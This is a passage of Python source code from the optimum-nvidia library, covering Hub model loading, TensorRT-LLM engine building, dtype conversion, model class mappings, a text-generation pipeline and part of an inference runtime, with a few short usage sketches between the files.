+ def from_ranked_checkpoints(checkpoints_folder: Path, target_class: Type[SupportFromTrtLlmCheckpoint]) -> Generator['TrtLlmPreTrainedModel', None, None]:
539
+ root = str(checkpoints_folder)
540
+ trtllm_config = PretrainedConfig.from_checkpoint(root)
541
+ for rank in range(trtllm_config.mapping.world_size):
542
+ yield target_class.from_checkpoint(root, rank, trtllm_config)
543
+
544
+ def from_ranked_hf_model(local_hf_model_path: Path, config: 'TransformersPretrainedConfig', target_class: Type['TrtLlmPreTrainedModel'], export_config: 'ExportConfig'):
545
+ root = str(local_hf_model_path)
546
+ for rank in range(export_config.sharding.world_size):
547
+ export_config.sharding.rank = rank
548
+ ranked_model = target_class.from_hugging_face(root, dtype=DataType.from_torch(config.torch_dtype).value, mapping=export_config.sharding, load_by_shard=True, use_parallel_embedding=export_config.sharding.world_size > 1, share_embedding_table=config.tie_word_embeddings)
549
+ ranked_model.config.mapping.rank = rank
550
+ yield ranked_model
551
+
552
+ class HuggingFaceHubModel(ModelHubMixin, library_name=LIBRARY_NAME, languages=['python', 'c++'], tags=['optimum-nvidia', 'trtllm'], repo_url='https://github.com/huggingface/optimum-nvidia', docs_url='https://huggingface.co/docs/optimum/nvidia_overview', metaclass=ABCMeta):
553
+
554
+ def __init__(self, engines_path: Union[str, PathLike, Path]):
555
+ self._engines_path = Path(engines_path)
556
+
557
+ @classmethod
558
+ def _from_pretrained(cls: Type[T], *, model_id: str, config: Dict, revision: Optional[str], cache_dir: Optional[Union[str, Path]], force_download: bool, proxies: Optional[Dict], resume_download: bool, local_files_only: bool, token: Optional[Union[str, bool]], use_cuda_graph: bool=False, device_map: Optional[str]=None, export_config: Optional[ExportConfig]=None, quantization_config: Optional[ModelOptRecipe]=None, force_export: bool=False, export_only: bool=False, save_intermediate_checkpoints: bool=False) -> T:
559
+ if get_device_count() < 1:
560
+ raise ValueError('No GPU detected on this platform')
561
+ device_name = get_device_name(0)[-1]
562
+ if 'torch_dtype' in config:
563
+ dtype = config['torch_dtype']
564
+ elif 'pretrained_config' in config and 'dtype' in config['pretrained_config']:
565
+ dtype = config['pretrained_config']['dtype']
566
+ else:
567
+ raise RuntimeError("Failed to detect model's dtype")
568
+ local_model_id = Path(model_id)
569
+ engines_folder = checkpoints_folder = None
570
+ engine_files = checkpoint_files = []
571
+ if local_model_id.exists() and local_model_id.is_dir():
572
+ if any((engine_files := list(folder_list_engines(local_model_id)))):
573
+ engines_folder = engine_files[0].parent
574
+ checkpoints_folder = None
575
+ else:
576
+ checkpoint_files = list(folder_list_checkpoints(local_model_id))
577
+ if checkpoint_files:
578
+ checkpoints_folder = checkpoint_files[0].parent
579
+ else:
580
+ if not force_export:
581
+ LOGGER.debug(f'Retrieving prebuilt engine(s) for device {device_name}')
582
+ engines_folder = get_trtllm_engines(model_id, device_name, dtype)
583
+ engine_files = folder_list_engines(engines_folder)
584
+ if not engine_files:
585
+ LOGGER.debug(f'Retrieving checkpoint(s) for {device_name}')
586
+ checkpoints_folder = get_trtllm_checkpoints(model_id, device_name, dtype)
587
+ checkpoint_files = folder_list_checkpoints(checkpoints_folder)
588
+ if not engine_files:
589
+ LOGGER.info(f'No prebuilt engines or checkpoints were found for {model_id}')
590
+ if local_model_id.is_dir():
591
+ LOGGER.debug(f'Retrieving model from local folder: {local_model_id}')
592
+ original_checkpoints_path_for_conversion = local_model_id
593
+ workspace = Workspace(local_model_id)
594
+ else:
595
+ LOGGER.debug(f'Retrieving model from snapshot {model_id} on the Hugging Face Hub')
596
+ original_checkpoints_path_for_conversion = snapshot_download(model_id, repo_type='model', revision=revision, cache_dir=cache_dir, force_download=force_download, proxies=proxies, resume_download=resume_download, local_files_only=local_files_only, token=token, allow_patterns=HUB_SNAPSHOT_ALLOW_PATTERNS)
597
+ workspace = None
598
+ config = NormalizedConfig(AutoConfig.for_model(**config))
599
+ generation_config = GenerationConfig.from_pretrained(original_checkpoints_path_for_conversion)
600
+ if FILE_LICENSE_NAME in original_checkpoints_path_for_conversion:
601
+ licence_path = original_checkpoints_path_for_conversion.joinpath(FILE_LICENSE_NAME)
602
+ else:
603
+ licence_path = None
604
+ export_config = export_config or ExportConfig.from_config(config)
605
+ if device_map and device_map == 'auto':
606
+ LOGGER.info('Auto parallelism will be used')
607
+ export_config = auto_parallel(export_config)
608
+ if isinstance(cls, SupportsTransformersConversion):
609
+ targets = cls.TRT_LLM_TARGET_MODEL_CLASSES
610
+ if not isinstance(targets, Mapping):
611
+ targets = {'': targets}
612
+ for (idx, (subpart, clazz)) in enumerate(targets.items()):
613
+ LOGGER.info(f'Building {model_id} {subpart} ({idx + 1} / {len(targets)})')
614
+ converter = TensorRTModelConverter(model_id, subpart, workspace, licence_path)
615
+ if quantization_config:
616
+ hf_model = cls.HF_LIBRARY_TARGET_MODEL_CLASS.from_pretrained(original_checkpoints_path_for_conversion, torch_dtype='auto', device_map='auto')
617
+ checkpoints_folder = converter.quantize(hf_model, quantization_config)
618
+ checkpoints_folder = checkpoints_folder.root
619
+ checkpoint_files = folder_list_checkpoints(checkpoints_folder)
620
+ del hf_model
621
+ torch.cuda.empty_cache()
622
+ if force_export or not len(list(converter.workspace.engines_path.glob('*.engine'))):
623
+ if checkpoint_files and isinstance(clazz, SupportFromTrtLlmCheckpoint):
624
+ ranked_models = from_ranked_checkpoints(checkpoints_folder, clazz)
625
+ elif isinstance(clazz, SupportsFromHuggingFace):
626
+ ranked_models = from_ranked_hf_model(original_checkpoints_path_for_conversion, config, clazz, export_config)
627
+ else:
628
+ raise TypeError(f"{clazz} can't convert from HF checkpoint")
629
+ generation_config = GenerationConfig.from_pretrained(original_checkpoints_path_for_conversion)
630
+ for ranked_model in ranked_models:
631
+ if save_intermediate_checkpoints:
632
+ _ = converter.convert(ranked_model)
633
+ LOGGER.info(f'Saved intermediate checkpoints at {converter.workspace.checkpoints_path}')
634
+ build_config = export_config.to_builder_config(ranked_model.config.quantization.quant_mode)
635
+ _ = converter.build(ranked_model, build_config)
636
+ engines_folder = converter.workspace.engines_path
637
+ generation_config.save_pretrained(engines_folder)
638
+ LOGGER.info(f'Saved TensorRT-LLM engines at {converter.workspace.engines_path}')
639
+ else:
640
+ LOGGER.info(f'Found existing engines at {converter.workspace.engines_path}')
641
+ else:
642
+ raise ValueError("Model doesn't support Hugging Face transformers conversion, aborting.")
643
+ else:
644
+ generation_config = GenerationConfig.from_pretrained(engines_folder)
645
+ return cls(engines_path=engines_folder, generation_config=generation_config, load_engines=not export_only)
646
+
647
+ @abstractmethod
648
+ def _save_additional_parcels(self, save_directory: Path):
649
+ raise NotImplementedError()
650
+
651
+ def _save_pretrained(self, save_directory: Path) -> None:
652
+ device_name = get_device_name(0)[-1]
653
+ save_directory = save_directory.joinpath(device_name)
654
+ save_directory.mkdir(parents=True, exist_ok=True)
655
+ src_license_file_path = self._engines_path.parent / FILE_LICENSE_NAME
656
+ dst_files = [src_license_file_path] if src_license_file_path.exists() else []
657
+ dst_files += list(self._engines_path.glob('*'))
658
+ for file in dst_files:
659
+ try:
660
+ symlink(file, save_directory.joinpath(file.relative_to(self._engines_path)))
661
+ except OSError as ose:
662
+ LOGGER.error(f'Failed to create symlink from current engine folder {self._engines_path.parent} to {save_directory}. Will default to copy based _save_pretrained', exc_info=ose)
663
+ dst = save_directory.joinpath(file.relative_to(self._engines_path))
664
+ if file.is_dir():
665
+ copytree(file, dst, symlinks=True)
666
+ elif file:
667
+ copyfile(file, dst)
668
+ self._save_additional_parcels(save_directory)
669
+
670
+ # File: optimum-nvidia-main/src/optimum/nvidia/lang/__init__.py
671
+ from enum import Enum
672
+ from typing import List
673
+ import torch
674
+
675
+ class DataType(str, Enum):
676
+ FLOAT32 = 'float32'
677
+ FLOAT16 = 'float16'
678
+ BFLOAT16 = 'bfloat16'
679
+ FLOAT8 = 'float8'
680
+ INT64 = 'int64'
681
+ INT32 = 'int32'
682
+ INT8 = 'int8'
683
+ UINT8 = 'uint8'
684
+ BOOL = 'bool'
685
+
686
+ @staticmethod
687
+ def from_torch(dtype: torch.dtype) -> 'DataType':
688
+ if dtype == torch.float32:
689
+ return DataType.FLOAT32
690
+ elif dtype == torch.float16:
691
+ return DataType.FLOAT16
692
+ elif dtype == torch.bfloat16:
693
+ return DataType.BFLOAT16
694
+ elif dtype == torch.float8_e4m3fn:
695
+ return DataType.FLOAT8
696
+ elif dtype == torch.int64:
697
+ return DataType.INT64
698
+ elif dtype == torch.int32:
699
+ return DataType.INT32
700
+ elif dtype == torch.int8:
701
+ return DataType.INT8
702
+ elif dtype == torch.uint8:
703
+ return DataType.UINT8
704
+ elif dtype == torch.bool:
705
+ return DataType.BOOL
706
+ else:
707
+ raise ValueError(f'Unknown torch.dtype {dtype}')
708
+
709
+ def to_trt(self) -> 'DataType':
710
+ import tensorrt as trt
711
+ if self == DataType.FLOAT32:
712
+ return trt.DataType.FLOAT
713
+ elif self == DataType.FLOAT16:
714
+ return trt.DataType.HALF
715
+ elif self == DataType.BFLOAT16:
716
+ return trt.DataType.BF16
717
+ elif self == DataType.FLOAT8:
718
+ return trt.DataType.FP8
719
+ elif self == DataType.INT8:
720
+ return trt.DataType.INT8
721
+ elif self == DataType.UINT8:
722
+ return trt.DataType.UINT8
723
+ elif self == DataType.INT32:
724
+ return trt.DataType.INT32
725
+ elif self == DataType.INT64:
726
+ return trt.DataType.INT64
727
+ elif self == DataType.BOOL:
728
+ return trt.DataType.BOOL
729
+ else:
730
+ raise ValueError(f'Unknown value {self}')
731
+
732
+ def to_torch(self):
733
+ import torch
734
+ if self == DataType.FLOAT32:
735
+ return torch.float32
736
+ elif self == DataType.FLOAT16:
737
+ return torch.float16
738
+ elif self == DataType.BFLOAT16:
739
+ return torch.bfloat16
740
+ elif self == DataType.FLOAT8:
741
+ return torch.float8_e4m3fn
742
+ elif self == DataType.INT8:
743
+ return torch.int8
744
+ elif self == DataType.UINT8:
745
+ return torch.uint8
746
+ elif self == DataType.INT32:
747
+ return torch.int32
748
+ elif self == DataType.INT64:
749
+ return torch.int64
750
+ elif self == DataType.BOOL:
751
+ return torch.bool
752
+ else:
753
+ raise ValueError(f'Unknown value {self}')
754
+
755
+ @staticmethod
756
+ def values() -> List[str]:
757
+ return [item.value for item in DataType]
758
+
759
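A quick round-trip example for the `DataType` enum above (a minimal sketch; it only assumes torch is installed, tensorrt is needed solely for `to_trt()`):

import torch

dtype = DataType.from_torch(torch.float16)
assert dtype is DataType.FLOAT16 and dtype.value == 'float16'
assert dtype.to_torch() == torch.float16
assert 'bfloat16' in DataType.values()
# dtype.to_trt() would return trt.DataType.HALF once tensorrt is importable.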
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/auto.py
760
+ from pathlib import Path
761
+ from typing import TYPE_CHECKING, Any, Dict, Optional, Type, Union
762
+ from huggingface_hub import ModelHubMixin
763
+ from optimum.nvidia.errors import UnsupportedModelException
764
+ from optimum.nvidia.models.gemma import GemmaForCausalLM
765
+ from optimum.nvidia.models.llama import LlamaForCausalLM
766
+ from optimum.nvidia.utils import model_type_from_known_config
767
+ if TYPE_CHECKING:
768
+ from optimum.nvidia.export import ExportConfig
769
+ from optimum.nvidia.runtime import CausalLM
770
+
771
+ class AutoModelForCausalLM(ModelHubMixin):
772
+ """"""
773
+ _SUPPORTED_MODEL_CLASS = {'llama': LlamaForCausalLM, 'mistral': LlamaForCausalLM, 'mixtral': LlamaForCausalLM, 'gemma': GemmaForCausalLM}
774
+
775
+ def __init__(self):
776
+ super().__init__()
777
+
778
+ @classmethod
779
+ def _from_pretrained(cls: Type, *, model_id: str, revision: Optional[str], cache_dir: Optional[Union[str, Path]], force_download: bool, proxies: Optional[Dict], resume_download: bool, local_files_only: bool, token: Optional[Union[str, bool]], config: Optional[Dict[str, Any]]=None, export_config: Optional['ExportConfig']=None, force_export: bool=False, use_cuda_graph: bool=False, **model_kwargs) -> 'CausalLM':
780
+ if config is None:
781
+ raise ValueError('Unable to determine the model type with config = None')
782
+ model_type = model_type_from_known_config(config)
783
+ if not model_type or model_type not in AutoModelForCausalLM._SUPPORTED_MODEL_CLASS:
784
+ raise UnsupportedModelException(model_type)
785
+ model_clazz = AutoModelForCausalLM._SUPPORTED_MODEL_CLASS[model_type]
786
+ model = model_clazz.from_pretrained(pretrained_model_name_or_path=model_id, config=config, revision=revision, cache_dir=cache_dir, force_download=force_download, proxies=proxies, resume_download=resume_download, local_files_only=local_files_only, token=token, export_config=export_config, force_export=force_export, use_cuda_graph=use_cuda_graph, **model_kwargs)
787
+ return model
788
+
789
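For reference, a hedged usage sketch of the dispatcher above; the model id is a placeholder, and the keyword arguments are the ones surfaced by `_from_pretrained`:

# Any supported gemma/llama/mistral/mixtral checkpoint can be used here (placeholder id).
model = AutoModelForCausalLM.from_pretrained(
    '<org>/<llama-like-model>',
    force_export=False,   # reuse prebuilt engines from the Hub or local cache when present
    use_cuda_graph=False,
)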
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/base.py
790
+ from os import PathLike
791
+ from typing import TYPE_CHECKING, Mapping, Optional, Protocol, Type, Union, runtime_checkable
792
+ if TYPE_CHECKING:
793
+ from tensorrt_llm.models import PretrainedConfig
794
+ from tensorrt_llm.top_model_mixin import TopModelMixin
795
+ from transformers import PreTrainedModel as TransformersPreTrainedModel
796
+
797
+ @runtime_checkable
798
+ class SupportsFromHuggingFace(Protocol):
799
+
800
+ @classmethod
801
+ def from_hugging_face(cls, hf_model_dir: Union[str, bytes, PathLike], dtype: str='float16', mapping: Optional[Mapping]=None, **kwargs):
802
+ ...
803
+
804
+ @runtime_checkable
805
+ class SupportFromTrtLlmCheckpoint(Protocol):
806
+
807
+ @classmethod
808
+ def from_checkpoint(cls, ckpt_dir: str, rank: Optional[int]=None, config: Optional['PretrainedConfig']=None):
809
+ ...
810
+
811
+ @runtime_checkable
812
+ class SupportsTransformersConversion(Protocol):
813
+ HF_LIBRARY_TARGET_MODEL_CLASS: Type['TransformersPreTrainedModel']
814
+ TRT_LLM_TARGET_MODEL_CLASSES: Union[Type['TopModelMixin'], Mapping[str, Type['TopModelMixin']]]
815
+
816
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/gemma.py
817
+ from logging import getLogger
818
+ from tensorrt_llm.models.gemma.model import GemmaForCausalLM as TrtGemmaForCausalLM
819
+ from transformers import GemmaForCausalLM as TransformersGemmaForCausalLM
820
+ from optimum.nvidia.hub import HuggingFaceHubModel
821
+ from optimum.nvidia.models import SupportsTransformersConversion
822
+ from optimum.nvidia.runtime import CausalLM
823
+ LOGGER = getLogger(__name__)
824
+
825
+ class GemmaForCausalLM(CausalLM, HuggingFaceHubModel, SupportsTransformersConversion):
826
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersGemmaForCausalLM
827
+ TRT_LLM_TARGET_MODEL_CLASSES = TrtGemmaForCausalLM
828
+ TRT_LLM_MANDATORY_CONVERSION_PARAMS = {'share_embedding_table': True}
829
+
830
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/mistral.py
831
+ from logging import getLogger
832
+ from tensorrt_llm.models.llama.model import LLaMAForCausalLM
833
+ from transformers import MistralForCausalLM as TransformersMistralForCausalLM
834
+ from optimum.nvidia.hub import HuggingFaceHubModel
835
+ from optimum.nvidia.models import SupportsTransformersConversion
836
+ from optimum.nvidia.runtime import CausalLM
837
+ LOGGER = getLogger(__name__)
838
+
839
+ class MistralForCausalLM(CausalLM, HuggingFaceHubModel, SupportsTransformersConversion):
840
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersMistralForCausalLM
841
+ TRT_LLM_TARGET_MODEL_CLASSES = LLaMAForCausalLM
842
+
843
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/mixtral.py
844
+ from logging import getLogger
845
+ from tensorrt_llm.models.llama.model import LLaMAForCausalLM
846
+ from transformers import MixtralForCausalLM as TransformersMixtralForCausalLM
847
+ from optimum.nvidia.hub import HuggingFaceHubModel
848
+ from optimum.nvidia.models import SupportsTransformersConversion
849
+ from optimum.nvidia.runtime import CausalLM
850
+ LOGGER = getLogger(__name__)
851
+
852
+ class MixtralForCausalLM(CausalLM, HuggingFaceHubModel, SupportsTransformersConversion):
853
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersMixtralForCausalLM
854
+ TRT_LLM_TARGET_MODEL_CLASSES = LLaMAForCausalLM
855
+
856
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/whisper.py
857
+ from logging import getLogger
858
+ from typing import TYPE_CHECKING
859
+ from tensorrt_llm.models import DecoderModel as TrtDecoderModel
860
+ from tensorrt_llm.models import WhisperEncoder as TrtWhisperEncoder
861
+ from transformers.models.whisper.modeling_whisper import WhisperForConditionalGeneration as TransformersWhisperForConditionalGeneration
862
+ from optimum.nvidia.models import SupportsTransformersConversion
863
+ if TYPE_CHECKING:
864
+ pass
865
+ LOGGER = getLogger(__name__)
866
+
867
+ class WhisperForConditionalGeneration(SupportsTransformersConversion):
868
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersWhisperForConditionalGeneration
869
+ TRT_LLM_TARGET_MODEL_CLASSES = {'encoder': TrtWhisperEncoder, 'decoder': TrtDecoderModel}
870
+
871
+ # File: optimum-nvidia-main/src/optimum/nvidia/pipelines/__init__.py
872
+ from os import PathLike
873
+ from typing import Dict, Optional, Tuple, Type, Union
874
+ from huggingface_hub import model_info
875
+ from tensorrt_llm import Module
876
+ from transformers import AutoTokenizer, PreTrainedTokenizer, PreTrainedTokenizerFast
877
+ from optimum.nvidia import AutoModelForCausalLM
878
+ from optimum.nvidia.pipelines.text_generation import TextGenerationPipeline
879
+ from .base import Pipeline
880
+ SUPPORTED_MODEL_WITH_TASKS: Dict[str, Dict[str, Tuple[Type[Pipeline], Type]]] = {'gemma': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}, 'llama': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}, 'mistral': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}, 'mixtral': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}}
881
+
882
+ def get_target_class_for_model_and_task(task: str, architecture: str) -> Optional[Type]:
883
+ task_ = SUPPORTED_MODEL_WITH_TASKS.get(task, None)
884
+ if not task_:
885
+ raise NotImplementedError(f'Task {task} is not supported yet.')
886
+ target = task_.get(architecture, None)
887
+ if not target:
888
+ raise NotImplementedError(f'Architecture {architecture} is not supported for task {task}. Only the following architectures are: {list(task_.keys())}')
889
+ return target
890
+
891
+ def pipeline(task: str=None, model: Union[str, PathLike, Module]=None, tokenizer: Optional[Union[str, PreTrainedTokenizer, PreTrainedTokenizerFast]]=None, **kwargs):
892
+ try:
893
+ info = model_info(model)
894
+ except Exception as e:
895
+ raise RuntimeError(f'Failed to instantiate the pipeline inferring the task for model {model}: {e}')
896
+ model_type = info.config.get('model_type', None)
897
+ if not model_type:
898
+ raise RuntimeError(f'Failed to infer model type for model {model}')
899
+ elif model_type not in SUPPORTED_MODEL_WITH_TASKS:
900
+ raise NotImplementedError(f'Model type {model_type} is not currently supported')
901
+ if not task and getattr(info, 'library_name', 'transformers') == 'transformers':
902
+ if not info.pipeline_tag:
903
+ raise RuntimeError(f'Failed to infer the task for model {model}, please use `task` parameter')
904
+ task = info.pipeline_tag
905
+ if task not in SUPPORTED_MODEL_WITH_TASKS[model_type]:
906
+ raise NotImplementedError(f'Task {task} is not supported yet for {model_type}.')
907
+ if tokenizer is None:
908
+ tokenizer = AutoTokenizer.from_pretrained(model, use_fast=True)
909
+ (pipeline_factory, model_factory) = SUPPORTED_MODEL_WITH_TASKS[model_type][task]
910
+ model = model_factory.from_pretrained(model, **kwargs)
911
+ return pipeline_factory(model, tokenizer)
912
+
913
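A hedged usage sketch of the `pipeline()` factory above (placeholder model id; the task can be omitted when the Hub metadata already carries a pipeline tag):

pipe = pipeline('text-generation', model='<org>/<supported-causal-lm>')
outputs = pipe('Hello, my name is')
print(outputs[0]['generated_text'])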
+ # File: optimum-nvidia-main/src/optimum/nvidia/pipelines/text_generation.py
914
+ import warnings
915
+ from enum import Enum
916
+ from typing import Dict, List, Union
917
+ import torch
918
+ from transformers import PreTrainedTokenizer, TensorType
919
+ from optimum.nvidia import AutoModelForCausalLM
920
+ from optimum.nvidia.runtime import CausalLM
921
+ from .base import Pipeline
922
+
923
+ class ReturnType(Enum):
924
+ TENSORS = 0
925
+ NEW_TEXT = 1
926
+ FULL_TEXT = 2
927
+
928
+ class TextGenerationPipeline(Pipeline):
929
+ TARGET_FACTORY = AutoModelForCausalLM
930
+ __slots__ = ('tokenizer', '_runtime')
931
+
932
+ def __init__(self, model: CausalLM, tokenizer: PreTrainedTokenizer):
933
+ super().__init__()
934
+ if tokenizer.eos_token and (not tokenizer.pad_token):
935
+ tokenizer.pad_token = tokenizer.eos_token
936
+ self.tokenizer = tokenizer
937
+ self._runtime = model
938
+
939
+ def __call__(self, inputs: Union[str, List[str]], add_special_tokens: bool=True, **kwargs):
940
+ (preprocess_params, forward_params, postprocess_params) = self._sanitize_parameters(add_special_tokens=add_special_tokens, **kwargs)
941
+ model_inputs = self.preprocess(inputs, **preprocess_params)
942
+ model_outputs = self._forward(model_inputs, **forward_params)
943
+ outputs = self.postprocess(model_outputs, **postprocess_params)
944
+ return outputs
945
+
946
+ def _sanitize_parameters(self, return_full_text=None, return_tensors=None, return_text=None, return_type=None, clean_up_tokenization_spaces=None, prefix=None, handle_long_generation=None, stop_sequence=None, add_special_tokens=False, **generate_kwargs):
947
+ preprocess_params = {'add_special_tokens': add_special_tokens}
948
+ if prefix is not None:
949
+ preprocess_params['prefix'] = prefix
950
+ if prefix:
951
+ prefix_inputs = self.tokenizer(prefix, padding=False, add_special_tokens=add_special_tokens, return_tensors=TensorType.PYTORCH)
952
+ generate_kwargs['prefix_length'] = prefix_inputs['input_ids'].shape[-1]
953
+ if handle_long_generation is not None:
954
+ if handle_long_generation not in {'hole'}:
955
+ raise ValueError(f"{handle_long_generation} is not a valid value for `handle_long_generation` parameter expected [None, 'hole']")
956
+ preprocess_params['handle_long_generation'] = handle_long_generation
957
+ preprocess_params.update(generate_kwargs)
958
+ forward_params = generate_kwargs
959
+ postprocess_params = {}
960
+ if return_full_text is not None and return_type is None:
961
+ if return_text is not None:
962
+ raise ValueError('`return_text` is mutually exclusive with `return_full_text`')
963
+ if return_tensors is not None:
964
+ raise ValueError('`return_full_text` is mutually exclusive with `return_tensors`')
965
+ return_type = ReturnType.FULL_TEXT if return_full_text else ReturnType.NEW_TEXT
966
+ if return_tensors is not None and return_type is None:
967
+ if return_text is not None:
968
+ raise ValueError('`return_text` is mutually exclusive with `return_tensors`')
969
+ return_type = ReturnType.TENSORS
970
+ if return_type is not None:
971
+ postprocess_params['return_type'] = return_type
972
+ if clean_up_tokenization_spaces is not None:
973
+ postprocess_params['clean_up_tokenization_spaces'] = clean_up_tokenization_spaces
974
+ if stop_sequence is not None:
975
+ stop_sequence_ids = self.tokenizer.encode(stop_sequence, add_special_tokens=False)
976
+ if len(stop_sequence_ids) > 1:
977
+ warnings.warn('Stopping on a multiple token sequence is not yet supported on transformers. The first token of the stop sequence will be used as the stop sequence string in the interim.')
978
+ generate_kwargs['eos_token_id'] = stop_sequence_ids[0]
979
+ return (preprocess_params, forward_params, postprocess_params)
980
+
981
+ def _forward(self, model_inputs, **generate_kwargs):
982
+ input_ids = model_inputs['input_ids']
983
+ prompt_text = model_inputs.pop('prompt_text')
984
+ attention_mask = model_inputs.get('attention_mask', None)
985
+ max_new_tokens = generate_kwargs.pop('max_new_tokens', None)
986
+ min_length = generate_kwargs.pop('min_length', -1)
987
+ num_beams = generate_kwargs.pop('num_beams', 1)
988
+ temperature = generate_kwargs.pop('temperature', 1.0)
989
+ top_k = generate_kwargs.pop('top_k', 50)
990
+ top_p = generate_kwargs.pop('top_p', 1.0)
991
+ repetition_penalty = generate_kwargs.pop('repetition_penalty', 1.0)
992
+ length_penalty = generate_kwargs.pop('length_penalty', 1.0)
993
+ seed = generate_kwargs.pop('seed', 2017)
994
+ (generated_sequence, lengths) = self._runtime.generate(input_ids=input_ids, attention_mask=attention_mask, max_new_tokens=max_new_tokens, min_length=min_length, num_beams=num_beams, temperature=temperature, top_k=top_k, top_p=top_p, repetition_penalty=repetition_penalty, length_penalty=length_penalty, seed=seed)
995
+ return {'generated_sequence': generated_sequence, 'lengths': lengths, 'input_ids': input_ids, 'prompt_text': prompt_text}
996
+
997
+ def preprocess(self, prompt_text, prefix='', handle_long_generation=None, add_special_tokens=False, **generate_kwargs) -> Dict[str, torch.Tensor]:
998
+ if isinstance(prompt_text, List):
999
+ text = [prefix + prompt for prompt in prompt_text]
1000
+ else:
1001
+ text = prefix + prompt_text
1002
+ inputs = self.tokenizer(text, padding=False, add_special_tokens=add_special_tokens, return_tensors=TensorType.PYTORCH)
1003
+ inputs['prompt_text'] = prompt_text
1004
+ return inputs
1005
+
1006
+ def postprocess(self, model_outputs, return_type=ReturnType.FULL_TEXT, clean_up_tokenization_spaces=True):
1007
+ generated_sequence = model_outputs['generated_sequence']
1008
+ generated_sequence = generated_sequence.cpu().numpy().tolist()
1009
+ records = []
1010
+ if return_type == ReturnType.TENSORS:
1011
+ return [{'generated_token_ids': generated} for generated in generated_sequence]
1012
+ for sequence in generated_sequence:
1013
+ text = self.tokenizer.decode(sequence, skip_special_tokens=True, clean_up_tokenization_spaces=clean_up_tokenization_spaces)
1014
+ record = {'generated_text': text}
1015
+ records.append(record)
1016
+ return records
1017
+
1018
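To make the postprocessing contract concrete, a small hedged sketch assuming `pipe` is a `TextGenerationPipeline` built by the factory above:

# Default return type is ReturnType.FULL_TEXT -> a list of {'generated_text': ...} records.
records = pipe('Once upon a time', max_new_tokens=32)
# return_tensors=True switches to ReturnType.TENSORS -> raw generated token ids instead.
token_records = pipe('Once upon a time', return_tensors=True)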
+ # File: optimum-nvidia-main/src/optimum/nvidia/runtime.py
1019
+ import asyncio
1020
+ import json
1021
+ import math
1022
+ from logging import getLogger
1023
+ from os import PathLike
1024
+ from pathlib import Path
1025
+ from typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Union
1026
+ import torch
1027
+ from tensorrt_llm.bindings.executor import ExecutorConfig, KvCacheConfig
1028
+ from tensorrt_llm.executor import GenerationExecutor, GenerationRequest, GenerationResult
1029
+ from tensorrt_llm.hlapi import SamplingParams
1030
+ from optimum.nvidia.hub import HuggingFaceHubModel
1031
+ from optimum.nvidia.utils.nvml import is_post_ampere
1032
+ if TYPE_CHECKING:
1033
+ from transformers import GenerationConfig
1034
+ LOGGER = getLogger(__name__)
1035
+
1036
+ def read_engine_config_file(path: Path) -> Dict[str, Any]:
1037
+ with open(path / 'config.json', 'r', encoding='utf-8') as config_f:
1038
+ return json.load(config_f)
1039
+
1040
+ def convert_generation_config(config: 'GenerationConfig') -> 'SamplingParams':
1041
+ return SamplingParams(end_id=config.eos_token_id, pad_id=config.pad_token_id, top_k=config.top_k if config.do_sample else 1, top_p=config.top_p, temperature=config.temperature, beam_width=config.num_beams if config.do_sample else 1, bad_token_ids=config.bad_words_ids, length_penalty=config.length_penalty, repetition_penalty=config.repetition_penalty, no_repeat_ngram_size=config.no_repeat_ngram_size if config.no_repeat_ngram_size > 0 else 1, min_length=config.min_length if config.min_length > 0 else 1, max_new_tokens=config.max_new_tokens, return_generation_logits=config.output_logits, return_log_probs=not config.renormalize_logits)
1042
+
1043
+ def default_executor_config(config: Dict[str, Any]) -> 'ExecutorConfig':
1044
+ build_config = config['build_config']
1045
+ plugin_config = config['build_config']['plugin_config']
1046
+ max_blocks_per_sequence = math.floor(build_config['max_seq_len'] / plugin_config['tokens_per_block'])
1047
+ return ExecutorConfig(enable_chunked_context=is_post_ampere(), kv_cache_config=KvCacheConfig(enable_block_reuse=True, max_tokens=build_config['max_beam_width'] * plugin_config['tokens_per_block'] * max_blocks_per_sequence))
1048
+
1049
+ class InferenceRuntimeBase:
1050
+ __slots__ = ('_config', '_executor', '_generation_config', '_sampling_config')
1051
+
1052
+ def __init__(self, engines_path: Union[str, PathLike], generation_config: 'GenerationConfig', executor_config: Optional['ExecutorConfig']=None, load_engines: bool=True):
1053
+ engines_path = Path(engines_path)
1054
+ if not engines_path.exists():
1055
+ raise OSError(f"engine folder {engines_path} doesn't exist")
1056
+ self._config = read_engine_config_file(engines_path)
1057
+ self._generation_config = generation_config
1058
+ self._sampling_config = convert_generation_config(generation_config)
1059
+ if load_engines:
1060
+ self._executor = GenerationExecutor.create(engine=engines_path, executor_config=executor_config or default_executor_config(self._config))
1061
+
1062
+ def generate(self, inputs: Union[List[int], 'torch.IntTensor'], generation_config: Optional['GenerationConfig']=None):
1063
+ sampling = convert_generation_config(generation_config) if generation_config else self._sampling_config
1064
+ if isinstance(inputs, torch.Tensor):
1065
+ inputs = inputs.tolist()
1066
+ result = self._executor.generate(inputs, sampling_params=sampling)
1067
+ return result[0].outputs[0].token_ids
1068
+
1069
+ async def agenerate(self, inputs: Union[List[int], 'torch.IntTensor'], generation_config: Optional['GenerationConfig']=None) -> List[int]:
1070
+ sampling = convert_generation_config(generation_config) if generation_config else self._sampling_config
1071
+ if isinstance(inputs, torch.Tensor):
1072
+ inputs = inputs.tolist()
1073
+ futures = self._executor.generate_async(inputs, streaming=False, sampling_params=sampling)
1074
+ if isinstance(futures, GenerationRequest):
1075
+ results = await futures.aresult()
1076
+ return results.token_ids
1077
+ else:
1078
+ results = await asyncio.gather(*[f.aresult() for f in futures])
1079
+ return [r.token_ids for r in results]
1080
+
1081
+ class CausalLMOutput:
1082
+ __slots__ = ('_results',)
1083
+
1084
+ def __init__(self, results: Union['GenerationResult', Sequence['GenerationResult']]):
1085
+ self._results = results
1086
+
1087
+ @property
1088
+ def logits(self):
1089
